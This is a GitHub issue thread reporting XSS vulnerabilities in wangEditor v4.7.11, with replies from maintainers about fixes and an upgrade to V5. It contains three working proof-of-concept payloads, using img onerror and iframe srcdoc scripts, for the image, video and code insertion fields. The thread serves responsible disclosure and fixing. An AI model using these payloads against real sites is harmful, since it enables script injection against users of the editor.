### ISSUE TITLE
XSS vulnerability

### ISSUE THREAD

**Issue by Mdxjj** [wangeditor-team/wangEditor#3872]
## bug 

*XSS vulnerability*

## wangEditor version

*V4.7.11*

## Can the official website reproduce the loopholes ？

*Yes*

## Reproduction steps

1.Use the following code to build the environment or on the official demo website(https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)
```
<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
  const E = window.wangEditor
  const editor = new E('#editor')
  editor.create()
</script>
```
2.Access the location where the image is inserted
payload:
`
"><img src=1 onerror=alert(/xss/)>
`
![image](https://user-images.githubusercontent.com/46616604/153156332-81e1d3e1-9eaa-4166-bbcd-d8104658d38a.png)
Successfully trigger the XSS vulnerability popup 
![image](https://user-images.githubusercontent.com/46616604/153156648-0f11ddf7-27cb-4f02-8cdd-31fb22160a79.png)
3.Access the location where the video was inserted 
payload:
```
<iframe srcdoc="<script>alert(/xss/)</script>">
```
![image](https://user-images.githubusercontent.com/46616604/153157631-1063b0ec-4b0f-4081-a3d4-437ad93a3013.png)
Successfully trigger the XSS vulnerability popup 
![image](https://user-images.githubusercontent.com/46616604/153157693-58a41541-2e30-41bb-8604-c898b33443cf.png)

4.Access the location where the code was inserted 
payload:
`
</xmp></code></pre><img src=1 onerror=alert(/xss/)>
`
![image](https://user-images.githubusercontent.com/46616604/153159792-bcf7d033-9f37-4a8c-acb7-2f54c39fd074.png)
Successfully trigger the XSS vulnerability popup 
![image](https://user-images.githubusercontent.com/46616604/153159869-f1ba621b-876a-4bb3-9a47-667264c8fd1e.png)

**Comment by wangfupeng1988** [comment]
和 https://github.com/wangeditor-team/wangEditor/issues/3870 重复了。

**Comment by Mdxjj** [comment]
The function points are different ([#3870](https://github.com/wangeditor-team/wangEditor/issues/3870) function point is at the image upload, and [#3872](https://github.com/wangeditor-team/wangEditor/issues/3872) has 3 different function points), so I don't think this is a duplicate.

**Comment by Gavin-yh** [comment]
关于code 和 img 的xss, 已经修复发版。但是iframe的srcdoc属性是一个危险属性，插入的内容需要用户自己控制，插入必须是可信的内容。

**Comment by wangfupeng1988** [comment]
[V5](https://www.wangeditor.com/) 已正式发布，v4 的 issue 将暂停处理。
该项目也是业余维护的，精力不够，还请体谅~

推荐尽快升级到 V5 版本。
